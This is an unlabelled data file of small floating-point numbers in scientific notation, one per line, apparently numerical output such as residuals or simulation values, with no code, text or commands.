-9.27994e-06
-2.44923e-06
-1.86711e-06
-6.64629e-06
-7.346e-06
-3.09689e-06
-1.35193e-05
-8.64862e-06
-2.4737e-06
-6.79146e-06
-1.0238e-05
-6.38992e-06
-1.4197e-05
-1.71698e-06
-7.08291e-06
-7.10138e-06
-3.27254e-06
-3.23554e-06
-8.3802e-07
-7.34602e-06
-9.07426e-06
-5.87498e-06
-7.0593e-06
-1.63515e-06
-9.42117e-06
-1.06122e-05
-6.77373e-06
-1.08337e-05
-6.92899e-06
-3.46102e-06
-6.4148e-06
1.93946e-06
1.45494e-06
9.90214e-07
-2.70138e-06
-5.69528e-06
-5.44992e-06
-2.2075e-06
-1.90753e-06
-6.04561e-06
-3.38886e-06
-6.52853e-06
-7.35558e-06
-7.40116e-06
-6.19652e-06
-5.66582e-07
-2.471e-06
-1.64831e-06
-6.07493e-06
-6.44433e-06
-8.12739e-06
-5.40921e-06
-4.5825e-06
-1.90208e-06
-1.45871e-06
-5.91934e-06
-4.9098e-06
-4.93073e-06
-4.5039e-06
-8.91111e-06
-9.281e-06
-1.87277e-06
-2.4558e-06
-7.35052e-06
-6.66211e-06
-3.10819e-06
-1.35257e-05
-8.65263e-06
-2.46859e-06
-6.79297e-06
-1.02387e-05
-6.37332e-06
-1.42132e-05
-1.77336e-06
-7.12998e-06
-7.18599e-06
-3.03837e-06
-3.09979e-06
-1.32478e-06
-7.39634e-06
-9.12073e-06
-5.8392e-06
-7.02002e-06
-1.51929e-06
-9.54548e-06
-1.07122e-05
-6.78964e-06
-1.09191e-05
-6.93481e-06
-3.49639e-06
-6.40508e-06
1.8537e-06
1.42952e-06
9.57795e-07
-2.69778e-06
-5.68078e-06
-5.42397e-06
-2.20599e-06
-5.76484e-07
-2.47925e-06
-1.66232e-06
-6.02027e-06
-6.36512e-06
-7.94491e-06
-5.38966e-06
-1.9337e-06
-6.06475e-06
-3.4143e-06
-6.53274e-06
-7.36057e-06
-7.40687e-06
-6.2062e-06
-1.92447e-06
-4.60188e-06
-1.48345e-06
-5.91568e-06
-4.9139e-06
-4.49975e-06
-4.93459e-06
-8.92746e-06
-9.28655e-06
-2.45981e-06
-1.87658e-06
-6.66806e-06
-7.35713e-06
-3.11362e-06
-1.35439e-05
-8.65833e-06
-2.47306e-06
-6.79746e-06
-1.02467e-05
-6.37868e-06
-1.42269e-05
-1.82181e-06
-7.18272e-06
-7.26353e-06
-3.08934e-06
-3.20814e-06
-1.39195e-06
-7.52313e-06
-9.15492e-06
-5.91188e-06
-7.08207e-06
-1.53783e-06
-9.53197e-06
-1.07141e-05
-6.79053e-06
-1.09276e-05
-6.93744e-06
-3.52687e-06
-6.40792e-06
-4.57143e-07
-3.41879e-06
-8.93513e-06
-5.45825e-06
-8.53362e-06
-8.63859e-06
-2.85717e-07
-4.41278e-07
-3.39556e-06
-8.92725e-06
-5.45054e-06
-8.49247e-06
-8.62298e-06
-2.61814e-07
1.97138e-06
1.46008e-06
1.00798e-06
-2.65622e-06
-5.62376e-06
-5.31147e-06
-2.18049e-06
-1.94019e-06
-6.04832e-06
-3.4054e-06
-6.48859e-06
-7.36279e-06
-7.40307e-06
-6.1994e-06
-5.63643e-07
-2.47037e-06
-1.66672e-06
-6.07378e-06
-6.4057e-06
-8.09273e-06
-5.3982e-06
-4.58983e-06
-1.91555e-06
-1.46576e-06
-5.9215e-06
-4.91088e-06
-4.93732e-06
-4.50066e-06
-8.92167e-06
-9.28062e-06
-1.8753e-06
-2.45303e-06
-7.3566e-06
-6.65432e-06
-3.11187e-06
-1.35264e-05
-8.65308e-06
-2.47268e-06
-6.79382e-06
-1.02433e-05
-6.39147e-06
-1.42043e-05
-1.81351e-06
-7.30617e-06
-7.24877e-06
-3.0505e-06
-3.11392e-06
-1.28309e-06
-7.43074e-06
-9.13722e-06
-5.87159e-06
-7.04291e-06
-1.65205e-06
-9.52644e-06
-1.07017e-05
-6.78282e-06
-1.0876e-05
-6.94019e-06
-3.55178e-06
-6.4207e-06
1.96254e-06
1.45787e-06
1.00315e-06
-2.67262e-06
-5.63317e-06
-5.3773e-06
-2.18958e-06
-1.90843e-06
-6.03881e-06
-3.38337e-06
-6.4847e-06
-7.35463e-06
-7.39534e-06
-6.18983e-06
-5.84613e-07
-2.47077e-06
-1.66402e-06
-6.07345e-06
-6.39015e-06
-8.11811e-06
-5.39257e-06
-4.58085e-06
-1.90295e-06
-1.45917e-06
-5.90876e-06
-4.90611e-06
-4.92888e-06
-4.4929e-06
-8.91238e-06
-9.28097e-06
-1.87333e-06
-2.45503e-06
-7.35119e-06
-6.65845e-06
-3.11064e-06
-1.35286e-05
-8.6512e-06
-2.4719e-06
-6.79573e-06
-1.02395e-05
-6.38962e-06
-1.42114e-05
-1.79187e-06
-7.18916e-06
-7.23562e-06
-3.04849e-06
-3.11404e-06
-1.33628e-06
-7.41333e-06
-9.12187e-06
-5.85015e-06
-7.01872e-06
-1.67673e-06
-9.54787e-06
-1.07116e-05
-6.79157e-06
-1.09113e-05
-6.94081e-06
-3.52069e-06
-6.41623e-06
-4.99301e-07
-3.47753e-06
-8.97576e-06
-5.52363e-06
-8.62516e-06
-8.71706e-06
-2.96426e-07
-4.96224e-07
-3.46661e-06
-8.93238e-06
-5.47618e-06
-8.55105e-06
-8.63426e-06
-3.51979e-07
-1.07521e-06
3.42763e-06
6.94747e-06
1.54165e-06
2.62826e-06
4.94097e-06
-1.08414e-06
-1.07892e-06
3.4319e-06
6.94563e-06
1.54474e-06
2.62746e-06
4.93687e-06
-1.07452e-06
-1.08291e-06
3.42332e-06
6.93765e-06
1.538e-06
4.93067e-06
2.62143e-06
-1.08591e-06
-1.07486e-06
3.42282e-06
6.94545e-06
1.53692e-06
4.95068e-06
-1.09697e-06
2.62714e-06
-1.07773e-06
3.41719e-06
6.94171e-06
1.53406e-06
4.94101e-06
2.62423e-06
-1.09956e-06
-1.06835e-06
3.42472e-06
6.95346e-06
1.53808e-06
4.96091e-06
-1.09559e-06
2.63167e-06
-1.08328e-06
3.41449e-06
6.93057e-06
1.53028e-06
2.61675e-06
4.93189e-06
-1.10196e-06
-1.0771e-06
3.41343e-06
6.93955e-06
1.53197e-06
2.62217e-06
4.9406e-06
-1.10514e-06
6.82062e-06
1.54369e-05
3.78447e-06
7.06806e-06
7.61023e-06
8.77497e-06
3.34668e-06
3.86456e-05
2.69066e-05
2.73962e-05
2.74567e-05
4.30648e-05
2.02318e-05
2.54063e-05
3.16709e-05
2.89999e-05
3.69921e-05
7.52643e-06
3.29637e-06
6.84406e-06
1.54619e-05
3.79995e-06
7.08732e-06
7.62936e-06
8.80453e-06
3.36323e-06
3.86987e-05
2.69743e-05
2.74749e-05
2.75134e-05
4.31293e-05
2.02789e-05
2.54466e-05
3.17366e-05
-2.1695e-08
7.63857e-06
9.70129e-06
-2.97378e-06
-1.36872e-06
1.23022e-05
-1.2866e-06
2.89355e-05
3.70571e-05
7.63292e-06
3.31141e-06
-2.92661e-08
7.64612e-06
9.69685e-06
-2.97168e-06
-1.37564e-06
1.22959e-05
-1.28187e-06
3.16615e-05
2.36432e-05
4.23532e-05
2.67854e-05
2.68122e-05
3.16415e-05
2.36298e-05
4.23194e-05
2.67671e-05
2.68015e-05
3.36702e-06
1.50676e-06
1.16155e-05
4.28275e-06
9.14226e-06
3.0286e-06
-1.20058e-06
3.08462e-06
5.62593e-06
5.45334e-06
9.99237e-06
3.82087e-06
1.79578e-06
7.79574e-06
3.08798e-06
5.6342e-06
5.45733e-06
9.99189e-06
3.82129e-06
1.8003e-06
7.80735e-06
2.89574e-05
3.70264e-05
7.6391e-06
3.41667e-06
2.89815e-05
3.70379e-05
7.59701e-06
3.28075e-06
3.1665e-05
2.36753e-05
4.2395e-05
2.68169e-05
2.68266e-05
3.1704e-05
2.3669e-05
4.23617e-05
2.67984e-05
2.68185e-05
3.38554e-06
1.16112e-05
4.2913e-06
1.50875e-06
9.14969e-06
3.02169e-06
-1.18357e-06
3.37151e-06
1.16095e-05
4.29546e-06
1.50357e-06
9.14716e-06
3.006e-06
-1.18777e-06
-1.71713e-06
5.42786e-06
1.81041e-06
1.80906e-06
-4.08046e-06
1.7807e-06
1.78598e-06
6.83016e-06
1.5459e-05
3.7871e-06
7.07224e-06
7.61495e-06
8.79289e-06
3.34796e-06
3.86668e-05
2.69369e-05
2.74279e-05
2.7445e-05
4.31693e-05
2.00638e-05
3.16207e-05
2.54483e-05
-2.87325e-08
7.64137e-06
9.69654e-06
-2.9945e-06
1.22972e-05
-1.37381e-06
-1.29628e-06
-2.01988e-08
7.64087e-06
9.71323e-06
-2.99194e-06
1.23175e-05
-1.36675e-06
-1.30363e-06
-1.62322e-06
5.99957e-06
-3.65159e-06
4.48103e-06
4.04542e-06
-3.5801e-06
-9.87941e-07
3.44685e-06
1.09979e-05
-3.77989e-07
-5.31588e-06
5.05066e-06
5.38525e-06
-2.16444e-06
-1.62576e-06
6.00338e-06
-3.65575e-06
4.48353e-06
4.04898e-06
-3.58262e-06
-9.92919e-07
3.42565e-06
1.09964e-05
-5.32102e-06
-3.84122e-07
5.3771e-06
-2.17125e-06
5.04529e-06
3.16528e-05
2.36144e-05
4.23291e-05
2.67512e-05
2.67883e-05
3.17054e-05
2.36535e-05
4.23518e-05
2.67763e-05
2.68388e-05
3.37682e-06
1.16176e-05
1.50631e-06
4.29868e-06
9.15191e-06
3.01194e-06
-1.18777e-06
3.09669e-06
5.64239e-06
5.46784e-06
1.00002e-05
1.81088e-06
3.82957e-06
7.81858e-06
2.89067e-05
3.71149e-05
7.51251e-06
3.41159e-06
-1.74547e-06
5.38079e-06
1.79294e-06
1.79319e-06
-4.08721e-06
1.75808e-06
1.74595e-06
-2.3631e-08
7.63254e-06
9.71016e-06
-2.99149e-06
1.23067e-05
-1.36665e-06
-1.30535e-06
6.84629e-06
1.54633e-05
3.80774e-06
7.07792e-06
7.64545e-06
8.78979e-06
3.35883e-06
3.86786e-05
2.69811e-05
2.74565e-05
2.74771e-05
4.31142e-05
1.98818e-05
3.1386e-05
2.55173e-05
-1.87819e-08
7.6327e-06
9.71092e-06
-2.991e-06
1.23163e-05
-1.36544e-06
-1.30473e-06
-1.62389e-06
6.00614e-06
-3.6568e-06
4.48151e-06
4.04814e-06
-3.58019e-06
-9.92436e-07
3.42082e-06
1.09912e-05
-3.81158e-07
-5.32022e-06
5.04342e-06
5.3691e-06
-2.17058e-06
-1.62447e-06
6.0031e-06
-3.65527e-06
4.48064e-06
4.04667e-06
-3.5791e-06
-9.91982e-07
3.42577e-06
1.09919e-05
-5.30949e-06
-3.59895e-07
5.37607e-06
-2.16157e-06
5.04341e-06
6.84547e-06
1.54592e-05
3.80626e-06
7.09018e-06
3.36524e-06
7.63591e-06
8.79391e-06
3.87405e-05
2.69955e-05
2.74987e-05
2.75226e-05
4.31593e-05
2.0257e-05
3.17628e-05
2.54719e-05
-2.66078e-08
7.61916e-06
9.70028e-06
-2.9975e-06
-1.37107e-06
1.22966e-05
-1.31379e-06
6.83531e-06
1.54534e-05
3.80025e-06
7.07861e-06
3.35586e-06
7.62523e-06
8.78223e-06
3.87109e-05
2.69691e-05
2.74686e-05
2.75176e-05
4.31432e-05
2.02945e-05
2.55005e-05
3.17325e-05
-1.62854e-06
5.99443e-06
-3.64687e-06
4.47559e-06
4.03956e-06
-3.58223e-06
-9.90973e-07
3.44689e-06
1.09983e-05
-5.30465e-06
-3.66485e-07
5.38997e-06
5.05231e-06
-2.15921e-06
-1.62551e-06
5.9954e-06
-3.65315e-06
4.47828e-06
4.0421e-06
-3.58018e-06
-9.92185e-07
3.43811e-06
1.09886e-05
-5.31469e-06
-3.71629e-07
5.37621e-06
-2.16448e-06
5.04869e-06
3.1742e-05
2.36718e-05
4.24131e-05
2.67919e-05
2.6829e-05
3.16847e-05
2.36737e-05
4.23797e-05
2.681e-05
2.68165e-05
3.38635e-06
1.16196e-05
1.50927e-06
4.301e-06
9.15838e-06
3.01948e-06
-1.18103e-06
3.09123e-06
5.64435e-06
5.46028e-06
9.99928e-06
1.80803e-06
3.80553e-06
7.82162e-06
2.89263e-05
3.70666e-05
7.59376e-06
3.36694e-06
-1.73616e-06
5.38764e-06
1.81666e-06
1.79223e-06
-4.08164e-06
1.77957e-06
1.74788e-06
-2.48786e-08
7.62364e-06
9.70184e-06
-2.99407e-06
-1.36994e-06
1.23001e-05
-1.30892e-06
6.83645e-06
1.54671e-05
3.80378e-06
7.08503e-06
3.36305e-06
7.62966e-06
8.79969e-06
3.87233e-05
2.69676e-05
2.74745e-05
2.75467e-05
4.31653e-05
2.029e-05
3.1788e-05
2.55007e-05
6.84946e-06
1.5463e-05
3.80781e-06
7.08819e-06
3.3649e-06
7.63897e-06
8.79323e-06
3.87079e-05
2.70067e-05
2.74859e-05
2.75576e-05
4.31352e-05
2.02389e-05
2.54841e-05
3.17357e-05
-1.62407e-06
5.99193e-06
-3.64672e-06
4.47758e-06
4.04173e-06
-3.5825e-06
-9.85451e-07
3.45354e-06
1.09983e-05
-5.30954e-06
-3.79391e-07
5.39322e-06
5.05089e-06
-2.16229e-06
-1.6258e-06
5.99879e-06
-3.65501e-06
4.48142e-06
4.04532e-06
-3.58332e-06
-9.9197e-07
3.42246e-06
1.09942e-05
-5.32086e-06
-3.79668e-07
5.36894e-06
-2.17047e-06
5.05202e-06
2.89254e-05
3.70392e-05
7.53355e-06
3.35975e-06
2.89164e-05
3.70872e-05
7.61538e-06
3.38958e-06
-1.72106e-06
5.37592e-06
1.78689e-06
1.78362e-06
-4.08681e-06
1.75048e-06
1.74538e-06
-2.78744e-07
3.81328e-06
-2.81761e-07
1.22815e-05
6.85718e-06
-1.20351e-07
-1.48592e-06
2.58524e-06
1.12414e-05
1.04047e-05
1.73001e-05
8.9081e-06
5.03428e-06
8.24173e-06
1.15493e-05
-6.7703e-06
4.3402e-08
-2.20847e-06
3.32325e-06
1.80402e-07
1.33836e-05
-2.77973e-07
3.80634e-06
-2.84612e-07
1.22686e-05
6.84817e-06
-1.24133e-07
-1.47722e-06
2.5931e-06
1.12651e-05
1.04111e-05
1.73082e-05
8.90913e-06
5.04454e-06
8.26086e-06
1.1544e-05
-6.76525e-06
1.35055e-08
-2.20684e-06
3.31328e-06
1.92656e-07
1.33599e-05
1.15319e-05
-6.77745e-06
1.47642e-08
-2.23183e-06
3.30735e-06
1.77491e-07
1.33471e-05
1.15462e-05
-6.77187e-06
2.38445e-08
-2.22035e-06
3.32319e-06
1.77946e-07
1.33578e-05
-8.263e-07
1.9849e-06
-4.91912e-06
-1.83561e-06
3.30435e-06
-6.56494e-06
2.54288e-07
-2.31978e-06
-7.00059e-07
6.12898e-06
2.62519e-06
3.69518e-06
1.57306e-07
-1.63321e-06
-8.30182e-07
1.986e-06
-4.91604e-06
-1.83675e-06
3.30575e-06
-6.56806e-06
2.52555e-07
-2.32669e-06
-7.00258e-07
6.12122e-06
2.63889e-06
3.69366e-06
1.54301e-07
-1.63392e-06
-2.74888e-07
3.79936e-06
-2.924e-07
1.22615e-05
6.84419e-06
-1.26482e-07
-1.47565e-06
2.60832e-06
1.1284e-05
1.04328e-05
1.73259e-05
8.92038e-06
5.05946e-06
8.27525e-06
1.15352e-05
-6.76569e-06
-2.21044e-06
1.68702e-08
1.90022e-07
3.30968e-06
1.33551e-05
-8.26172e-07
1.98512e-06
-1.83316e-06
-4.91603e-06
3.30615e-06
-6.56412e-06
2.55007e-07
-2.32246e-06
-6.99953e-07
6.11813e-06
2.6398e-06
3.69665e-06
1.54906e-07
-1.63212e-06
-8.27611e-07
1.98564e-06
-4.91592e-06
-1.83712e-06
3.30825e-06
-6.56725e-06
2.53073e-07
-2.31886e-06
-6.98104e-07
6.13031e-06
2.62393e-06
3.69285e-06
1.65217e-07
-1.63377e-06
-2.43101e-07
3.80757e-06
-3.29376e-07
1.22593e-05
6.86074e-06
-1.50122e-07
-1.39737e-06
2.61342e-06
1.12155e-05
1.03992e-05
1.7263e-05
8.9099e-06
5.05266e-06
8.26518e-06
-2.93557e-07
3.81583e-06
-2.89693e-07
1.22565e-05
6.848e-06
-1.30142e-07
-1.48919e-06
2.58036e-06
1.12541e-05
1.04077e-05
1.72818e-05
8.89966e-06
5.0464e-06
8.24948e-06
-3.17978e-07
3.81351e-06
-2.95984e-07
1.22314e-05
6.82263e-06
-1.42302e-07
-1.51051e-06
2.55912e-06
1.12163e-05
1.03861e-05
1.72446e-05
8.87896e-06
5.02115e-06
8.21407e-06
1.15322e-05
-6.77112e-06
-2.19739e-06
1.65998e-08
1.92566e-07
3.30616e-06
1.3371e-05
-8.312e-07
1.98532e-06
-1.83811e-06
-4.91453e-06
3.30879e-06
-6.56917e-06
2.51356e-07
-2.32106e-06
-7.0002e-07
6.12936e-06
2.63865e-06
3.69902e-06
1.6226e-07
-1.63296e-06
-8.23169e-07
1.98596e-06
-4.91001e-06
-1.83138e-06
3.30876e-06
-6.55788e-06
2.56541e-07
-2.31809e-06
-6.99178e-07
6.12577e-06
2.64015e-06
3.70024e-06
1.60828e-07
-1.63065e-06
-2.90068e-07
3.8318e-06
-2.77622e-07
1.22917e-05
6.85324e-06
-1.37987e-07
-1.47115e-06
2.58343e-06
1.12123e-05
1.03989e-05
1.72884e-05
8.9049e-06
5.02767e-06
8.24142e-06
-2.96194e-07
3.81077e-06
-2.99428e-07
1.22502e-05
6.84254e-06
-1.3843e-07
-1.49249e-06
2.58205e-06
1.1243e-05
1.04039e-05
1.72893e-05
8.90428e-06
5.03965e-06
8.24353e-06
1.15116e-05
-6.78766e-06
-2.2398e-06
-1.88178e-09
1.59719e-07
3.28959e-06
1.33318e-05
1.15315e-05
-6.77633e-06
-2.22083e-06
1.3889e-08
1.81357e-07
3.30526e-06
1.33567e-05
-8.33839e-07
1.98295e-06
-4.91949e-06
-1.83575e-06
3.30042e-06
-6.56814e-06
2.52308e-07
-2.3295e-06
-7.01402e-07
6.10328e-06
2.63412e-06
3.68336e-06
1.49139e-07
-1.63453e-06
-8.29329e-07
1.98613e-06
-4.92348e-06
-1.83981e-06
3.308e-06
-6.57419e-06
2.53659e-07
-2.31867e-06
-6.98411e-07
6.1298e-06
2.64166e-06
3.70198e-06
1.63938e-07
-1.6308e-06
3.1753e-06
1.22846e-06
1.53296e-06
-2.06176e-06
-4.59277e-06
-5.35113e-06
-7.38305e-07
3.18217e-06
1.21286e-06
1.53545e-06
-2.03147e-06
-4.50664e-06
-5.27795e-06
-7.13613e-07
3.19952e-06
1.28159e-06
1.54976e-06
-2.04591e-06
-4.54165e-06
-5.31571e-06
-7.2388e-07
3.17938e-06
1.1949e-06
1.52529e-06
-2.07189e-06
-4.60192e-06
-5.38521e-06
-7.44787e-07
3.1742e-06
1.24734e-06
1.54859e-06
-2.07113e-06
-4.57574e-06
-5.36626e-06
-7.47764e-07
3.17849e-06
1.1865e-06
1.51404e-06
-2.09309e-06
-4.58537e-06
-5.4246e-06
-7.34377e-07
3.1907e-06
1.28799e-06
1.56019e-06
-2.03314e-06
-4.54546e-06
-5.26009e-06
-7.28676e-07
3.19641e-06
1.25339e-06
1.54454e-06
-2.04656e-06
-4.54976e-06
-5.32716e-06
-7.22297e-07
5.41906e-06
5.90379e-06
6.78417e-06
8.86774e-06
5.76995e-06
7.84894e-06
6.56519e-06
1.30883e-05
2.13072e-05
2.44119e-05
1.68849e-05
1.69362e-05
1.54694e-05
1.86678e-05
1.03085e-05
-1.45536e-06
9.16385e-06
-4.59346e-06
1.21737e-05
8.34896e-06
-2.15567e-06
5.33048e-06
2.01507e-05
9.09268e-06
2.60915e-05
1.46234e-06
5.05003e-06
5.51753e-06
1.51636e-05
7.8943e-06
2.36028e-05
1.58052e-05
4.82261e-06
2.60265e-05
-1.15172e-05
-1.37815e-05
1.4374e-06
9.44731e-06
-9.98196e-06
1.79983e-05
2.00855e-05
5.99164e-06
3.88923e-05
-5.39413e-06
1.26252e-05
4.64993e-05
1.77809e-06
2.15275e-05
4.53615e-05
5.44862e-06
5.98548e-06
6.85162e-06
8.86568e-06
5.81834e-06
7.88205e-06
6.59073e-06
1.31033e-05
2.13409e-05
2.44359e-05
1.68376e-05
1.69672e-05
1.54705e-05
1.8659e-05
1.03207e-05
-1.43904e-06
-4.56025e-06
9.1902e-06
1.22138e-05
-2.13807e-06
8.35486e-06
5.349e-06
2.01371e-05
9.10511e-06
2.61444e-05
1.43489e-06
4.99632e-06
5.46042e-06
1.51527e-05
7.85393e-06
2.36409e-05
1.59296e-05
4.7417e-06
2.60941e-05
-1.15495e-05
-1.38092e-05
1.41445e-06
9.40644e-06
-9.97229e-06
1.80503e-05
2.00957e-05
6.01115e-06
3.89113e-05
-5.39323e-06
1.26269e-05
4.65386e-05
1.78125e-06
2.15773e-05
4.53143e-05
2.23466e-06
-7.74035e-07
-1.53327e-05
-2.06745e-06
-4.20915e-06
-9.951e-06
1.8324e-06
-9.88389e-07
-3.8674e-06
-4.8053e-06
1.23096e-06
4.24527e-06
-1.09035e-05
-7.55767e-07
2.22339e-06
-7.76243e-07
-1.53374e-05
-2.06938e-06
-4.21446e-06
-9.95797e-06
1.82822e-06
-1.00955e-06
-3.87082e-06
-4.80715e-06
1.22274e-06
4.21245e-06
-1.09119e-05
-7.62013e-07
5.44361e-06
5.8789e-06
6.81875e-06
8.83976e-06
5.77668e-06
7.86801e-06
6.61125e-06
1.31275e-05
2.13289e-05
2.44317e-05
1.69248e-05
1.69606e-05
1.54862e-05
1.87794e-05
1.03324e-05
-1.45048e-06
9.16871e-06
-4.57313e-06
1.21955e-05
8.35319e-06
-2.14044e-06
5.30124e-06
2.01035e-05
9.06128e-06
2.61782e-05
1.45709e-06
4.98052e-06
5.53295e-06
1.514e-05
8.0477e-06
2.3617e-05
1.603e-05
4.72239e-06
2.60953e-05
-1.1525e-05
-1.37626e-05
1.45101e-06
9.41537e-06
-9.9659e-06
1.80419e-05
2.00982e-05
6.01169e-06
3.88917e-05
-5.37966e-06
1.26365e-05
4.65049e-05
1.79385e-06
2.15906e-05
4.51869e-05
2.22214e-06
-7.77868e-07
-1.53365e-05
-2.06854e-06
-4.21768e-06
-9.9551e-06
1.82733e-06
-1.00698e-06
-3.86919e-06
-4.79552e-06
1.22351e-06
4.21412e-06
-1.09072e-05
-7.62259e-07
2.23355e-06
-7.74802e-07
-1.53286e-05
-2.0709e-06
-4.20851e-06
-9.94947e-06
1.83048e-06
-9.86647e-07
-3.87178e-06
-4.8149e-06
1.23198e-06
4.24145e-06
-1.0897e-05
-7.55875e-07
5.39736e-06
5.87257e-06
6.79361e-06
8.78577e-06
5.7577e-06
7.82579e-06
6.51503e-06
1.31097e-05
2.13088e-05
2.44442e-05
1.6928e-05
1.69449e-05
1.54711e-05
1.87843e-05
1.03071e-05
-1.45085e-06
9.16002e-06
-4.59075e-06
1.21695e-05
8.35124e-06
-2.15768e-06
5.31223e-06
1.99994e-05
8.92176e-06
2.57576e-05
1.4805e-06
4.64456e-06
5.33881e-06
1.51226e-05
9.16295e-06
2.32761e-05
1.59469e-05
4.67414e-06
2.59617e-05
-1.15324e-05
-1.37896e-05
1.36539e-06
9.36667e-06
-1.00318e-05
1.78402e-05
2.00804e-05
6.02444e-06
3.88992e-05
-5.40306e-06
1.26002e-05
4.65605e-05
1.78714e-06
2.14574e-05
4.54229e-05
5.4266e-06
6.01345e-06
6.8299e-06
8.81711e-06
5.81015e-06
7.85343e-06
6.52887e-06
1.30836e-05
2.13165e-05
2.44395e-05
1.68685e-05
1.69311e-05
1.54689e-05
1.87029e-05
1.03361e-05
-1.44685e-06
-4.57756e-06
9.16906e-06
1.21917e-05
-2.14274e-06
8.35099e-06
5.37825e-06
2.01327e-05
9.14336e-06
2.58659e-05
1.4184e-06
5.23375e-06
5.57647e-06
1.52955e-05
7.55304e-06
2.35693e-05
1.59074e-05
4.76837e-06
2.60488e-05
-1.15708e-05
-1.37815e-05
1.39424e-06
9.43305e-06
-1.00106e-05
1.79473e-05
2.00865e-05
6.01344e-06
3.89092e-05
-5.39381e-06
1.26166e-05
4.65473e-05
1.78989e-06
2.15311e-05
4.53083e-05
5.4317e-06
5.89934e-06
6.80219e-06
8.85713e-06
5.77002e-06
7.84825e-06
6.60694e-06
1.3108e-05
2.13051e-05
2.4393e-05
1.68679e-05
1.69471e-05
1.54568e-05
1.86773e-05
1.03109e-05
-1.45452e-06
9.164e-06
-4.58787e-06
1.21753e-05
8.34994e-06
-2.15634e-06
5.41774e-06
2.0143e-05
9.13143e-06
2.58674e-05
1.41641e-06
5.22259e-06
5.55698e-06
1.52797e-05
7.51569e-06
2.36083e-05
1.59671e-05
4.78608e-06
2.6066e-05
-1.15675e-05
-1.37791e-05
1.41388e-06
9.43644e-06
-1.00031e-05
1.79841e-05
2.00648e-05
5.99011e-06
3.88549e-05
-5.41083e-06
1.26e-05
4.64751e-05
1.76939e-06
2.14734e-05
4.52047e-05
2.22951e-06
-7.75137e-07
-1.5333e-05
-2.07123e-06
-4.20567e-06
-9.95888e-06
1.8298e-06
-9.98254e-07
-3.86963e-06
-4.7914e-06
1.22877e-06
4.24065e-06
-1.09064e-05
-7.59981e-07
2.23513e-06
-7.71513e-07
-1.53205e-05
-2.06354e-06
-4.20358e-06
-9.94235e-06
1.83327e-06
-9.88462e-07
-3.85804e-06
-4.77629e-06
1.23311e-06
4.23603e-06
-1.08841e-05
-7.53519e-07
5.40323e-06
5.8828e-06
6.80521e-06
8.83887e-06
5.77442e-06
7.85032e-06
6.50367e-06
1.3113e-05
2.13152e-05
2.4459e-05
1.6884e-05
1.69626e-05
1.54646e-05
1.87487e-05
1.03095e-05
-1.45074e-06
-4.59553e-06
9.17228e-06
1.21666e-05
-2.15643e-06
8.34692e-06
5.44489e-06
2.02216e-05
9.18665e-06
2.5915e-05
1.4404e-06
5.21497e-06
5.55483e-06
1.53033e-05
7.51128e-06
2.36183e-05
1.60201e-05
4.73468e-06
2.60277e-05
-1.15475e-05
-1.37577e-05
1.42789e-06
9.43381e-06
-1.00109e-05
1.7978e-05
2.00548e-05
5.98916e-06
3.88775e-05
-5.40889e-06
1.25943e-05
4.64873e-05
1.76345e-06
2.13884e-05
4.53439e-05
5.45046e-06
5.99818e-06
6.84582e-06
8.85907e-06
5.81775e-06
7.87299e-06
6.59403e-06
1.31023e-05
2.13165e-05
2.44416e-05
1.68368e-05
1.69576e-05
1.54676e-05
1.8669e-05
1.03321e-05
-1.44193e-06
-4.58404e-06
9.16994e-06
1.21801e-05
-2.14227e-06
8.36041e-06
5.35732e-06
2.01134e-05
9.13078e-06
2.58719e-05
1.42471e-06
5.21941e-06
5.56463e-06
1.52901e-05
7.57043e-06
2.35783e-05
1.59846e-05
4.71951e-06
2.60199e-05
-1.15604e-05
-1.37664e-05
1.39339e-06
9.41865e-06
-1.00148e-05
1.79538e-05
2.00904e-05
6.01259e-06
3.89051e-05
-5.39815e-06
1.26262e-05
4.65551e-05
1.78755e-06
2.14275e-05
4.54341e-05
2.22262e-06
-7.76052e-07
-1.53312e-05
-2.06736e-06
-4.2152e-06
-9.95143e-06
1.8274e-06
-9.97388e-07
-3.86592e-06
-4.79067e-06
1.22831e-06
4.23407e-06
-1.08968e-05
-7.59357e-07
2.23087e-06
-7.74758e-07
-1.53382e-05
-2.06895e-06
-4.21099e-06
-9.95604e-06
1.83081e-06
-1.00308e-06
-3.86511e-06
-4.79939e-06
1.22361e-06
4.21484e-06
-1.09035e-05
-7.59592e-07
-5.39962e-06
-7.37822e-07
-4.15592e-06
3.3194e-06
-1.43963e-05
9.02825e-06
-7.21892e-07
2.36641e-06
-1.2034e-05
-2.67596e-06
1.40703e-06
-1.25717e-05
2.38244e-07
1.69009e-06
-5.39322e-06
-7.23526e-07
-4.15344e-06
3.32603e-06
-1.43899e-05
9.04058e-06
-7.15041e-07
2.37894e-06
-1.2027e-05
-2.67272e-06
1.41255e-06
-1.25639e-05
2.47493e-07
1.69608e-06
-5.39946e-06
-7.37402e-07
-4.15497e-06
3.31913e-06
-1.43944e-05
9.02362e-06
-7.21e-07
2.36928e-06
-1.20255e-05
-2.67355e-06
1.41054e-06
-1.2565e-05
2.42457e-07
1.69141e-06
-5.39872e-06
-7.40769e-07
-4.15415e-06
3.3204e-06
-1.43936e-05
9.02554e-06
-7.15937e-07
2.34964e-06
-1.20322e-05
-2.67484e-06
1.39985e-06
-1.25698e-05
2.19115e-07
1.68624e-06
-5.39084e-06
-7.31018e-07
-4.15586e-06
3.32051e-06
-1.43901e-05
9.03323e-06
-7.21161e-07
2.37912e-06
-1.20323e-05
-2.67619e-06
1.40748e-06
-1.25641e-05
2.43089e-07
1.6931e-06
-5.39807e-06
-7.35533e-07
-4.15679e-06
3.32181e-06
-1.43938e-05
9.03017e-06
-7.21693e-07
2.37237e-06
-1.20321e-05
-2.67733e-06
1.40747e-06
-1.25675e-05
2.41584e-07
1.69088e-06
-5.39418e-06
-7.28615e-07
-4.15524e-06
3.3175e-06
-1.4392e-05
9.03781e-06
-7.21107e-07
2.37485e-06
-1.20334e-05
-2.67688e-06
1.40832e-06
-1.25687e-05
2.43045e-07
1.6927e-06
-5.39622e-06
-7.26914e-07
-4.15539e-06
3.32402e-06
-1.43923e-05
9.03616e-06
-7.17053e-07
2.38036e-06
-1.20246e-05
-2.67489e-06
1.41211e-06
-1.25625e-05
2.50113e-07
1.69497e-06
3.42357e-05
8.31974e-06
3.06066e-05
2.03452e-05
2.53567e-05
2.35318e-05
4.12907e-05
3.422e-05
8.39058e-06
3.05428e-05
2.04177e-05
2.54136e-05
2.36457e-05
4.12513e-05
2.23841e-05
1.51714e-05
9.23395e-06
3.00411e-05
1.08658e-05
2.22348e-05
1.5107e-05
9.12293e-06
2.99475e-05
1.07756e-05
3.42213e-05
8.36037e-06
3.05157e-05
